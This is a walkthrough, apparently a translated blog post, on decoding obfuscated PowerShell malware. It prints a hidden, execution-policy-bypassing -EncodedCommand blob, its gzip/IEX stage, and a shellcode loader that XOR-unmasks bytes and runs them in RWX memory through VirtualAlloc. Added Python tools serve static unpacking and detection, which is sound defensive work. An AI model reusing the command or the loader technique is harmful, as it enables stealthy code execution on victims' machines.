Decoding obfuscated PowerShell code: a step-by-step walkthrough
Word count: 539  2025-08-05 00:16:39
1. Overview of PowerShell obfuscation techniques
PowerShell obfuscation is used mainly to evade security detection and logging. Common methods include:
- Base64 encoding
- String reversal
- Variable renaming
- Code compression
- Encryption
Microsoft added logging features to newer PowerShell versions (such as Transcription and ScriptBlock logging), so attackers rely on obfuscation to evade detection. Note that ScriptBlock logging (Event ID 4104) records a script block when it is invoked, so each layer below still appears in the log once it executes; the encoding chiefly hides the payload from command-line inspection.
2. Key parameters
The -EncodedCommand parameter
Accepts a base64-encoded string version of a command. Use this parameter
to submit commands to Windows PowerShell that require complex quotation
marks or curly braces.
This parameter executes a Base64-encoded command; it lets complex strings be wrapped so that special characters are not misparsed. The encoded text is UTF-16LE, not UTF-8, which matters when decoding it on a non-Windows host.
Other common parameters
- -nop (NoProfile): do not load the PowerShell profile
- -w hidden (WindowStyle Hidden): hide the console window
- -exec bypass (ExecutionPolicy Bypass): bypass the execution policy
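The abbreviated switches above work because powershell.exe matches parameter names by prefix, so -nop, -w and -exec are the same parameters as -NoProfile, -WindowStyle and -ExecutionPolicy. The script below is an added example, not code from the original article: it normalises such abbreviations in a captured process command line and reports the evasion-related traits listed above. Its parameter table covers only a subset of switches and the shortest-prefix values are an assumption modelled on powershell.exe's parser; the sample command line is constructed.

```python
import re

# Subset of powershell.exe parameters with the shortest prefix each accepts.
# Assumption: modelled on powershell.exe's prefix matching; not the complete list.
# (matched name, shortest accepted prefix, canonical name, takes a value)
PARAMETER_TABLE = [
    ("encodedcommand", "e", "encodedcommand", True),
    ("ec", "ec", "encodedcommand", True),
    ("executionpolicy", "ex", "executionpolicy", True),
    ("windowstyle", "w", "windowstyle", True),
    ("command", "c", "command", True),
    ("file", "f", "file", True),
    ("noprofile", "nop", "noprofile", False),
    ("nologo", "nol", "nologo", False),
    ("noninteractive", "noni", "noninteractive", False),
    ("noexit", "noe", "noexit", False),
]


def canonical_param(token):
    """Expand an abbreviated switch such as -nop, -w or -ec to (canonical name, takes_value).
    Returns None for unknown or still-ambiguous prefixes (e.g. -no)."""
    name = token.lstrip("-/").lower()
    for matched, shortest, canonical, takes_value in PARAMETER_TABLE:
        if matched.startswith(name) and len(name) >= len(shortest):
            return canonical, takes_value
    return None


def tokenize(cmdline):
    """Split on whitespace but keep double-quoted arguments together (quotes stripped)."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_cmdline(cmdline):
    """Turn a process command line into {canonical parameter: value-or-True}."""
    tokens = tokenize(cmdline)
    parsed = {"exe": tokens[0] if tokens else "", "params": {}, "other": []}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        hit = canonical_param(tok) if tok.startswith(("-", "/")) else None
        if hit is None:
            parsed["other"].append(tok)
            i += 1
            continue
        canonical, takes_value = hit
        if takes_value and i + 1 < len(tokens):
            parsed["params"][canonical] = tokens[i + 1]
            i += 2
        else:
            parsed["params"][canonical] = True
            i += 1
    return parsed


def indicators(parsed):
    """Report the evasion-related traits the article lists, by canonical name."""
    p = parsed["params"]
    hits = []
    if "encodedcommand" in p:
        hits.append("EncodedCommand")
    if str(p.get("windowstyle", "")).lower().startswith("h"):
        hits.append("WindowStyle Hidden")
    if str(p.get("executionpolicy", "")).lower() == "bypass":
        hits.append("ExecutionPolicy Bypass")
    if p.get("noprofile"):
        hits.append("NoProfile")
    return hits


if __name__ == "__main__":
    # Constructed sample in the shape of the article's command line (blob shortened).
    sample = "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAA="
    parsed = parse_cmdline(sample)
    print(parsed["params"])
    print(indicators(parsed))
```

Because the same parameter can be spelled -e, -ec, -enc or -EncodedCommand, a detection rule that looks only for the literal string "-encodedcommand" misses most real samples; normalising first and matching on the canonical name avoids that.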
3. The decoding process in detail
3.1 Initial Base64 decoding
Original obfuscated sample:
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWAA3ADMATwBpAFMAQgBQACsASABQADgASwBQAHEAUgBLAHEAVABXAGUARQBjADAAbQBlADcAVgBWAGkAdwBxAEsAQwBrAG4ARQAzADcAbABVAGEAcABnAFoARQBRAE0ARAB3AGkAQwBRADIALwAzAGYAcgAwAEgATgBaAFcAKwB6ADkAMgA3AFYAKwA3ADUAVwBVAFEANAB6ADMAVAAzAGQAegB6AHoAZAAwADUAaQBVAFgANQBnADgAZABEAEQAWABmAFUASwBGAGkAeABrAE4ASQA4AGQAbgBRAHEATgBVAE8AdQAvADYARwBoAGMAKwBDADEALwBLAHAAWABYAE0ATQBNACsAbgA4ADgARwBUAFQAZgBsAFQARQBQAHIANABDAFIARQBTADAAaQBnAFMALwBpAHkAZAAzAGEARQBRAGUAVQBMAGwAZgBJAC8AQwBKADgAOABuAHMAVQB1AHIAUQB2AEcAUwBDADEASQBTAGgAMQBRADgATwB5AHUAZABGAFYATQB4AGkAOQBDAGEAUABqAEgARQBuAFQAMQA5ADgAaQBqAGYAKwBDAFMAQwBqAFMAbwBQAGMAaABCADAAZgBRADgANQA3AFAASABUAHAAMAA0AGMAaABwAFQAeAB3ADMAdQB0AFIANwBrAGMAUgBkAFMAegBYAEkAZABHAEYAVgBIADQASwBzAHcAMwBOAEsAUQBYAHQAOQBhAFcAWQBpADcAOABLAFoAdwAvADEAWABxAHUAYgB5AEgAMwBLAEoAWgAxAEUATgA1AEEAUQBEAEkAagArAGQAcgBJAHgAeQBpAFAAbwBHAFkARwByAHMATQByADUAVAAvACsASwBJAHMAUABGADUAZQBQAE4AVwBVAFgASQB6AGUAcQBsAE0AMABzADQAdABTAHIARQBkAGMAdABpADgASQAzAE0AZAA5AHcAawBnAFcAMABVAHQAWQBkAEgAUABxAFIAdgArAGEAMQB1AGMATwBrAFIAbQAxAGEAZQBHADgAVQB6AHUAcwBIADMAOAB2AGkATQBUAEkANwBRAEIARABIAHoANABQAE0AcgBSADUAMABLAG0AVQBZADMAZwBFADIAOABnAEgARABjAGwAVgA0AHkAUABkADcAZQBIAHcAVQB2AHIAeAA2AE0ANAA0AFoAZAB6AHgAYQAwAHgAaQBuAG8AUgArAFkATgBOAHcANwBtAEUAYQAxAFAAbQBMAEUAcABXAE8ANgBCAHIAVgB5AEIATQBmAEgANwBMAEkASQBUAG8AUwBVAHgAeQBFAFQAVAByADYAQQAzAHQANQAvAHAAcABWAHoARgByAHQAdQBGAGUAdwArAC8ASwByAGQAeAA0AHAAQgBrAHgATwA0AHYANgBwAFUAZQBhAHMARQBVAG4AYwA4AEYASwB0AEgAVAB2AHcASwBIAEgAcgBCAG0ANABNADUAQwBPAGMASAA3ADkAKwBRAFMANABUAGYARAB3AFEAVABTADkAOQBLADcAMQBDAFYAVQBKAGYAYQBpAE4ATQBuAEQAdgBpACsANABXAHIAcAA3AE8AeQBoAEcARgBLAEkAcAAzAEwAbgBSADAANgBoADkAMQBtAG8AVgB3AFUAZABuAEUARABjAEQANwBQADgATwBDAGQAaABUAE0AWABIAHYAOAAvAG4AcwBPADEASgBNADYAcgArADEATgBEAGwAUwBlAHUAbwBjAHoAaQBlAGcAeAArAGYAaABZAG
UAWgA3ADUARABIADAAcABsAFkATwByAEkAbgBuADMAKwB5AFkAcwBjAGwATgBNAHoAWABmADUANABOAFgAYgBwADIARwBPADEAbQBEAEgAawBPAFAAaABHACsAOAB0ADYAWgAwAGIAVgBMAEMAegB4AHEASgB6AEUARAAvAEsAeQBVAGoAdwB1AFUAZABJAC8AbwBsAEgATgBBAEgAMwA1AFUAVQB6AHkASAB2ACsAcQAyAEQAOAA3AEoARwBNADQAOQBBAHEAKwBBAEUAdQBMADMAegBoAHoATwBzAEYATABXAG0ARQA0ADkAdwBPAC8AdwBEAGoAUQA5AFgAMABPAGEAMABaAFAAMABNAGIAVwB5ADAAKwA3ADUAZQA4ADcAbABqAG8AdQBpAHEAQwByAGMAeABaAEQAbgB1AEMAcQBZAEYATABtAFUAVgBBAFcAWgBSAGMANQB4AFMAWQA2ADUAWAB3AHoATABmADcAdQByAHgAeQA1ADMATQBJAHIANAB5AGQAeQBqACsAQQA2AGsAeAA2ADAANwBQAG8ATwBNAGkAVABHAGMATABzAEEAdwBNAFEATwBLAEgAZQBUAG0AcQBGAFMARgB2AGsATgBvAE8AegBNAGQAKwArAFIAQwArAFYAMQBNAE8AcwBoADEASQBlAFgAQQAwAGgANwBPAEIARwBaAHkATABFAHkAZQBjAHkAWQBrADEAWAAvAHkAUQA2AHkAWgBsAEcAdABlADQARgBJAFAAcABJAHMAcQBwAEwAcgBJAGgAcABwAHoAegBLAGkAQwBiAHMAaQBtAHAAUAB3AHYAYgBwAC8AeQA1AEoAQQBVAE8AVgBZAG4AawBOADQANABEAFEAUQB3AFgAWgA5AFgAaABaAGsAVABjAHEAaAByADUAZQBvAFAAeABQAHYAdgAzAFAAdQArAHgASAB6AG4AWgBpAGUAawB4ADQATwBzAEYASQBuADQAMABNADUANABuAGkANgBGAEoATQA0AHYAbAA4ACsAdgBXAEIAYgBJAGgAUgB4AFEAVQAwAFAAZgBhADYATwBJAFgAagBYAE4AbwBvAHgAVgB5AHQASgAxAHYATgBNAHkAZgBYAHQALwBGAGYAYQBVAHYAZAByAGYAOQBaAFUASgBQAEgAdAA0AHAASgAyAHEAagBFAGEARABjAGQAQQBlAGoANwBBAFMAMwA5ADcAMQA2ADQATwAxAGQAbgAvAGQAYgBjAFoASgByAE0AVwBUAGQAbAAxAFMANgB5AEQAMwBzAHUAcwBwAGEAMgAxAC8ANgB5ADgAdgBZADYAOQA1AFMAUQBKAHQAYgA4AEIAYwA5AEgASABYAGoANwByAGEAdgBpAHYAMwBHAHoAdABmAHYAYgBLAGQAbQA2AE8AZABnAC8ANgA5AGwAVgB4AGEAQwAwADMAOQBhAFAAWABVAFoAbgA4AFcAcQBiAGwAOABYADkAdQAzADEAVgAzAG4AeABvAGYAeABiADkAcQArADQAdwA5AEEANwAvAG8AcQBZAE8AMgBFAE4ASwBrAHkAdQBLAEsATABFAFUANABrAGYAawAyAFIAbgBXAGIARAAyAFEAZQB6AGYAdABtAGIAWgBjAFoAbwBwAGcAUwBHAHkAYwBqAEkAdQByAHgAWABCADgAWgBMAFEAKwBGAHAAbgBmAFQASABkAGEASgBFAEsAegBMAGIASwBkAEsAZABOAFEAdwBnAFQAawAyAHkAegBTAHMAMgB5AEUAeQB6AG4AZQBGAG4AbgB1AFcAeAA0ADcANAB4AEkAcwBQAGQAZABZAHUAOABOAEQATABWAGEAQQBJAE8AcQBaAG4AcABtACsAVQBWAFMAZgBGAEMAVABmAEQAQwBHAEcAWAA5AHAAZABFAEQAdQA3AHQANABiAGoAZgA3AHUAaQBtAEIAYgBaAE8AawBDAcwA3ACsATAA2AFYAawBNAGEAQQByAHgAcQBEAGQAS
gBXADAASABHAHQAQgBkAG0AUQBlAHAASQBUAEoAdAA2AFMAeABTAGsAagBTAGMAcABGADMANAA4AGsAMgBDAFQAdQA5AGEASwBDAGwAcQAwAGgAbQBlAGsAKwBUAFYAdgBkAGoAVgA3AGwAZABQAG8AOQA3AGsAeABsAGUAeQBZADIAVwBQAHAAOABHAGQANQBPADYAcABxAHQASgBmAFMASQBuAFgASgA0AG8AcgBjAG0AOQBTADQAYgAzADAANQB0AGUAVAB6AFoAaQAzAEEAcwA4AE8AWQAwAE0ASgBiAFcANwBCAE0ANQBqAFgARQArAG4AVQA5AG4AZwBKAE4ASABuADMAYgBHADIAbABDAFUAeQBOAHAAOQBKAGIAcQArAHcAQQBUAHIANwA1AFYAeABOAHIAZgA0ADQAVwBUAEYAbABPAEgASwBlAHQANgBxAFgAZABIAEMAeQAyAGkANgBaADAAVgBTAGwAbQB4AGUANgBpAE8AWgBxAHcAbAAvAFcAOQAvADUAMAAyAFoATwBIAEsAbgBCAGwANQBRAFgAMgBrAGkAbQAzAHUARQA4AGMAYQAwADQAYwBQAE0AZQAzAFMAKwA5AFMAUQBtAHkAMgB3ADQAdABWADAAbQBYAEUAdwAzADEAOAB1ADUAbwBIACsANQBXAHQAOQBWAEcAeQBDAFQAdgBtAC8AeAArAHoAWgBXAFAAdwBRAHQAdgBrAE4AeQB5ADUASAA5AFUATgBIAG0ARwBwAFAAbABSADcAYgBSAHYAcwAwADMAWgBqAHQAVgB2ADIAQgBtAG0AWAB0AFMAWAB3AGwAUwAyAFoAeQByAHIAZQBnAEoATgBHAGMASQBtAFkAMgBzAEIAeQBTADEAcgBCAFcAdABlAGIANwBhAHoARwBzAHQATgB1AFIAQgBwAEsALwBvAEUASAA4AEwAegBlAFEAbQAwAEMAUABEAFgAbgB4AGsAaAA3AEEAVAA3AFgAbwA2ADMAVwAwAEwAZABFADQAUgA4ADMAVQByAGMASABQAEUAdwA4ADQAQQB2AHcAeQBQAG4AQQBCAHMAawB1AEEAcAA1AG0AZQBsAGYATABqAEoAeQByAEsAVQBkAGgAdQArAEQAcQA1AGQAcgBkAGQAZQA2AGQANQB0AEQAYQB6AHEATABWAHgANgBZAGUARAB5AFgAKwBnAHAAVwBOAGIAaQBnAGIAMwArAGkAbAA4AEQALwBHAFYAcAA0AGYAOABIAHoATwBxADkASABhAEQANgBHAC8AUwBQAE0ANwArADMAYwBCAC8AaQA5AGMATAByAHoAVwBHADYAZwB5AFUATQBEAHkAKwBRADgAZgB4AFAAegBlAGYAMQAxADUATwBFADgAZgBUADMAMwBhADYALwB1AEYAbABZAEkAMQBxAFoAWABYAHIAbQBKAGwAagA5ADUAVQByAEoAOAAxAFAAegBvAEsAbwB3ADEAeQBvAFoASgBCAEEAMwBPADYAZgBsAFEALwBWAEkAOQB0AHkASgAzAHYANQBCAHEAVgB5AHYAdQBkADgAegBNAE4ARwBYAFcAaABxADQAUwArADgAMQBTADAAWgBkAGYAMQBjAGQANAA0AC8AYQBTAEQAZwBUAGIAdQAwAEYAdwA5AHcAdQBVADAAaABhAEgAVQBlAEgAYwBrAEMAcQArAEMAMABDADAAZABZAHIATABpADkAYgBwAG8ATABvADQAUgBuAG4AcQBzAGsAKwBDAG4AVAB5AHMASQByAC8AbwBHAHgAQgBGAGwATgB0ADkAVQBoAFgAbwBxADEAZQB2ADEALwBMADkAWgBGADAAdQAvAEQAawB2AEgARAA3AEwASwBxADcAbABxADMAbAB5ADkAOABlAFQAdABUAG0ANgB4AGsAMwBoAEUAUAA0AHkAWgBSAC8AKwBIAEIALwBEAGQAcAB2ADgAWgAyAGgAeQA4AG8AagA5ADcAaABhADUAd
wA2AEgAMgA4AHgARgBMADUAUwA2AG0AawByAFkAVQAzADgANQBIAHoAQQBsADgAZgBkAEMAZABjAEYAOQB5AEwAZwBPAGIAOABZAHUAdABiADgASwBsAFMAMwBMADIAVgBjAHkAUQBLAG0AcgBJAFEAegBwAEgAdwBUAGIAaQBBADgATwBSAEkAYQBzAEQAMwBTAG0AagBIACsAVQBVAHMASABEADYALwB2AGcAbwBKAGMAZwA2AEsAWAA0AFUAeAB4AFIAVABhADUANAB1AEIAYgB3AEYATABLAGYAUgBUAHUAZQBuAEMAUwBDADQATQBjADMAOABCAGsAdwBzAC8ANQA4ADgATgBBAEEAQQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBu
Decoding method (macOS base64 takes -D, GNU coreutils takes -d; the decoded text is UTF-16LE, so a plain decode leaves a NUL byte after every character and iconv is needed to make it readable):
echo -n "JABzAD0ATgBlAHcALQBPAGIAagBlAGM..." | base64 -D | iconv -f UTF-16LE -t UTF-8
Decoding yields:
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAA..."));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
3.2 GZIP decompression
The decoded code shows that the payload was GZIP-compressed and then Base64-encoded, which can be recognised by two features:
- it begins with "H4sIAAAA" (the Base64 form of the gzip magic bytes 1f 8b 08 followed by a zero mtime)
- it is decompressed with IO.Compression.GzipStream
Decompression method:
echo -n "H4sIAAAA..." | base64 -D | gunzip
After decompression we obtain the PowerShell loader code:
Set-StrictMode -Version 2
$DoIt = @'
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [System.Convert]::FromBase64String('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')
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([
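The three layers walked through above (UTF-16LE Base64 from -EncodedCommand, gzip plus Base64 inside FromBase64String, and the loader's -bxor 35 loop) can all be peeled statically without executing anything. The script below is an added example, not code from the article or from the loader's authors: it builds a constructed blob of the same shape (a placeholder string standing in for the removed byte array), unwraps each layer in turn, and recovers the masked bytes the way an analyst would before handing them to a disassembler. The function names and the sample are the example's own.

```python
import base64
import gzip
import re

MASK_KEY = 35  # the -bxor key used by the loader on the page
PLACEHOLDER = b"constructed placeholder bytes, not real shellcode"


def build_sample():
    """Construct a blob with the same three layers as the article's sample
    (UTF-16LE+Base64 -> gzip+Base64 -> XOR-masked bytes). Constructed input only."""
    masked = bytes(b ^ MASK_KEY for b in PLACEHOLDER)
    loader = (
        "Set-StrictMode -Version 2\n"
        "[Byte[]]$var_code = [System.Convert]::FromBase64String('%s')\n"
        "for ($x = 0; $x -lt $var_code.Count; $x++) {\n"
        "$var_code[$x] = $var_code[$x] -bxor %d\n"
        "}\n" % (base64.b64encode(masked).decode("ascii"), MASK_KEY)
    )
    gz_b64 = base64.b64encode(gzip.compress(loader.encode("utf-8"), mtime=0)).decode("ascii")
    outer = (
        '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"));'
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
        "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();" % gz_b64
    )
    return base64.b64encode(outer.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob):
    """Stage 1: -EncodedCommand is Base64 over UTF-16LE text, so decode it as such
    rather than treating the bytes as ASCII with stray NULs."""
    blob = blob.strip()
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    raw = raw[: len(raw) - len(raw) % 2]  # a truncated capture may end on half a code unit
    return raw.decode("utf-16-le", errors="replace")


# Stage 2 signature: a FromBase64String argument starting with H4sI (gzip magic 1f 8b 08).
GZIP_B64 = re.compile(r"""FromBase64String\(["'](H4sI[A-Za-z0-9+/=]+)["']\)""")


def extract_gzip_payload(script):
    m = GZIP_B64.search(script)
    return m.group(1) if m else None


def decode_gzip_b64(payload):
    return gzip.decompress(base64.b64decode(payload)).decode("utf-8", errors="replace")


def unwrap(blob, max_stages=5):
    """Peel layers until no further gzip+Base64 payload is found; returns each stage's text."""
    stages = [decode_encoded_command(blob)]
    while len(stages) < max_stages:
        inner = extract_gzip_payload(stages[-1])
        if inner is None:
            break
        stages.append(decode_gzip_b64(inner))
    return stages


# Stage 3: the loader's byte array and the key of its -bxor loop.
XOR_LOOP = re.compile(r"""FromBase64String\(['"]([A-Za-z0-9+/=]+)['"]\)[\s\S]*?-bxor\s+(\d+)""")


def unmask_bytes(script):
    """Static equivalent of the loader's for/-bxor loop: recover the byte array without running it."""
    m = XOR_LOOP.search(script)
    if m is None:
        return None
    key = int(m.group(2))
    return bytes(b ^ key for b in base64.b64decode(m.group(1)))


if __name__ == "__main__":
    stages = unwrap(build_sample())
    for n, text in enumerate(stages, 1):
        print("stage %d: %s" % (n, text[:60].replace("\n", " ")))
    print(unmask_bytes(stages[-1]))
```

On a real capture, feed the -EncodedCommand value to unwrap() and the last stage to unmask_bytes(); the recovered bytes are what the loader would have passed to VirtualAlloc, and they can be hashed or disassembled without ever being mapped executable.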